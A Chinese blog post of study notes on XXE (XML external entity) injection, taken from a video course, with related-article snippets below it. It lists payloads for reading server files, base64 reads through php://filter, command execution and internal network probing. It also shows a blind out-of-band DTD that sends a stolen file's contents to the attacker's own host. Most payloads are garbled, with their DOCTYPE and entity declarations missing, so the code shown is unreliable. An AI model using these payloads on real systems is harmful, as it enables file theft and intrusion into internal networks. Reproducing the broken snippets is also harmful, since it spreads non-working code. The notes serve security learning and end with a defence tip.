xxe漏洞(简单理解)外部实体化注入

最新推荐文章于 2023-09-08 14:30:00 发布
最新推荐文章于 2023-09-08 14:30:00 发布
阅读量2.3k 收藏
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/121777197
版权

xxe漏洞(简单理解)外部实体化注入
页面之间使用xml语句进行数据的传递,在xml中插入对应外部实体可以实现文件的读取,端口访问等

<?xml version="1.0" encoding="UTF-8"?>

]>

&xxe;

<?xml version = "1.0"?>

]>
&xxe;

<?xml version = "1.0"?>

]>
&xxe;

即可读取到d://a.txt的内容

<?xml version = "1.0"?>

]>
&xxe;

<?xml version = "1.0"?>

]>
&xxe;

即可读取到d:/a/a.txt下面的a.txt内容
在这两端简单的xml注入语句中,路径中的/与//效果一致(d://a.txt,d://a/a.txt),可以进行某些绕过

命令执行 (目标主机需要安装 expect 扩展)

<?xml version = "1.0"?>

]>
&xxe;

间接读取文件方法
引用data,目标主机上的data(需要先上传.dtd文件,比较鸡肋)

<?xml version="1.0" ?>

%file;
]>
&send;

evil2.dtd:

<!ENTITY send SYSTEM "file:///d:/test.txt">

毫无疑问,以上漏洞需要绝对路径

<?xml version="1.0" ?> <!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=a.txt">

]>
&sp;hj

<?xml version = "1.0"?>

]>
&tianxia;
此段代码以base64编码形式返回与本页面相同路径下的a.txt中的内容

<?xml version = "1.0"?>

]>
&tianxia;
访问上一级的a.txt内容

关于无回显的xml注入
在本机搭建index.php接受data传入的参数,添加test.dtd如下文,原理:将获取到的text.txt通过本地的dad文件传送到index.php中

<?xml version="1.0"?> <!ENTITY % dtd SYSTEM "http://本机ip:8081/test.dtd">

%dtd;
%send;
]>
test.dtd:

<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://本机ip:8081/?data=%file;'>"

%payload;

内网方面的利用:如果本地访问不了内网其他主机,在http://192.168.0.103:8081/index.txt此位置添加对应的函数sql注入等(都查询出来内网主机的ip和对应端口漏洞,使用这个略显鸡肋)

-内网探针或攻击内网应用(触发漏洞地址)

<?xml version="1.0" encoding="UTF-8"?> <!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" >

]>
&rabbit;

标志:使用burpsuit抓包如果数据包中存在content-type:xml即有可能存在xml注入
使用bp中的spider模块执行探测,爬取完之后,使用搜索对存在xml字符的页面进行检测即可
防御方法:将libxml_disable_entity_loader设置为TRUE来禁用外部实体

本文为小迪视频的笔记

天下是个小趴菜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xxe外部实体注入漏洞
糖小喵
04-22 643
XXE原理 在应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成a:文件读取b:命令执行c:内网端口扫描d:攻击内网网站e:发起DDos攻击等 XXE漏洞检测: 1):检测xml是否被成功解析 <!DOCTYPE ANY[ <!ENTITY name "my name is xxx"> ...
XXE实体注入XXE-lab-master(php_xxe WriteUp)
weixin_41487522的博客
06-25 2014
XXE实体注入 XXE是什么? XXE=xml external entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分。 什么是XML? XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计为具有自我描述性。 XML 是 W3
外部实体注入漏洞
weixin_45007073的博客
02-17 715
原理 当允许引用外部实体时,会造成外部实体注入(XXE)漏洞。通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。XXE漏洞分为如下两种:有回显的XXE和无回显的XXE漏洞展示 有回显的XXE 我们现在d盘上新建了一个hacker.txt文件用于测试,首先我们先使用burpsuite进行抓包,这里的靶场使用的是php_xxe。 这是XML注入的代码,因为在抓包时我们发现数据是以XML的格式进行传送的,初步判断可能存在XML外部实体注入漏洞 <?xml ve
XXE外部实体注入漏洞
haoge1998的博客
04-15 151
XXE外部实体注入漏洞 一、概念 libxml2.9以前默认开启了外部实体引用功能导致的注入 二、XML文档结构 1、XML语法 XML文档必须有一个根元素 必须有关闭标签 对大小写敏感 正确嵌套 属性值必须加引号 <?xml version="1.0" encoding="UTF-8"?> <class> <id>2022</id> </class> 2、DTD(document type definition) xml文档结
漏洞总结——XXE(XML外部实体注入
Spontaneous_0的博客
09-08 458
XXE漏洞全称为 XML External Entity Injection,即XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致用户可以控制外部的加载文件,造成XXE漏洞
XXE超详细讲解 全网仅此一份
07-06
XXE(XML External Entity injection)是一种安全漏洞,它发生在解析XML输入时,由于应用程序未能正确处理外部实体,攻击者能够注入恶意的XML实体,从而读取服务器上的敏感文件、执行系统命令或探测内网资源。...
fortify安全基础知识 不同语言软件安全漏洞
05-27
- **XML解析漏洞**:XML外部实体攻击(XXE)可能通过恶意构造的XML文档泄露系统信息或执行恶意代码。 - **DLL劫持**:恶意第三方可以替换系统或应用程序的DLL,导致意外行为。 Fortify工具通过静态代码分析,能...
完整的漏洞赏金备忘单.pdf
最新发布
10-06
9. **XXE(XML外部实体注入)**:通过注入恶意XML文档,攻击者可以泄露服务器信息或执行远程代码。应禁用XML解析器中的外部实体加载,或使用安全配置。 10. **开放重定向**:攻击者引导用户跳转到恶意网站,进行...
Web中间件常见漏洞总结(免积分)
02-09
禁用XML外部实体加载或使用安全的解析库可以防止此类攻击。 九、中间件版本过时 使用过时的中间件版本可能导致已知漏洞被攻击者利用。保持中间件及时更新,安装所有安全补丁,是防止此类问题的关键。 十、不安全的...
XXE漏洞基础以及进阶
weixin_45682070的博客
06-26 376
XML编程基础 XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。 XML 被设计...
XXE漏洞——XML实体定义引起的兼容性问题
学无止境
10-27 1万+
XXE漏洞——XML实体定义引起的兼容性问题 一、XML基础知识 XML指可扩展的标记语言(Extensible Markup Language),类似于HTML(超文本标记语言); XML被设计用来结构、存储以及传输信息,其焦点是数据的内容; XML没有任何预定义的标签,所有标签均由开发者自定义,开发者可以依据需要定制与业务匹配的结构标签; XML是对HTML的补充
ssrf漏洞xxe漏洞简单理解
qq_54030686的博客
11-27 2079
ssrf漏洞简单理解)服务端请求伪造 产生原因:服务端加载其他网站的文件进行利用,而其他网站路径可以进行修改导致的漏洞利用 经常出现的位置:图片的加载,文件读取,网页转码等; 标志:url=http://127.0.0.1/1.jpg 利用手段:可以进行内网的端口探测,读取文件等, 防御方法:验证返回值,统一报错信息 详情见:https://blog.csdn.net/qq_30135181/article/details/52734225 xxe漏洞简单理解外部实体注入 简单的说,类似于命令注入
linux expect 自动交互 执行命令 超时 不完整 中断 解决方法
whatday的专栏
05-01 6463
使用 expec t自动交互执行命令时,默认超时timeout为30s 手动添加set timeout -1设置 超时时间为无穷大 就可以执行完命令了 通过expect执行scp,传输文件不完整 写了一个脚本来传输文件,类似于这样: sendsystem(){ expect -c " spawn scp $ORACLE_BASE/oradata/$ORACLE_SID...
哆啦靶场 SSRF、XXE、XSS、XSS学习、SQL部分通关教程
锋刃科技的博客
04-26 3405
SSRF漏洞靶场 来到SSRF首页 看看file_get_content.php 这应该就是file_get_content要包含的文件了 假设我们本地搭建一个1.php文件 然后包含这个文件即可 为什么不是php形式的样子,而是html的形式,因为htmlentities函数把包含进来的转换成html实体了 第二关 输入端口445,账号秘密都是r...
用友 GRP-U8 Proxy XXE-SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
10-09 3462
用友GRP-U8 Proxy 存在SQL注入漏洞,攻击者可通过该漏洞获取服务器权限,详情点击了解更多。
SQL注入详解
热门推荐
huangyongkang666的博客
03-20 4万+
SQL注入详解 1.SQL注入简介 ​ SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。 ​ Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一 2. sql 注入产生原因及威胁 ​ 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行
XXE实体注入(超详细!)
qq_45300786的博客
09-06 9684
可以把它理解为txt,就是存储文件的, 读取并调用出来,这是最核心的 将你的代码当成XXE代码,然后XXE再交给PHP去执行 将1.txt的东西,放入test这个变量 实体就是变量 &test就是输出这个变量 <scan></scan>只是一个声明格式,随便写什么,就算写成<abc></abc>都可以,只要满足<x></x>格式就行 最主要的是访问的地址,file,http等协议都可以。 XXE:XML外部实体注入,原理:.
XXE xml实体注入
4ct10n
11-03 6415
1.科普ENTITY 实体 在一个甚至多个XML文档中频繁使用某一条数据,我们可以预先定义一个这条数据的“别名”,即一个ENTITY,然后在这些文档中需要该数据的地方调用它。 XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用。 ENTITY的定义语法: <!DOCTYPE 文件名 [ <!ENTITY 实体名 "实体内容">
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值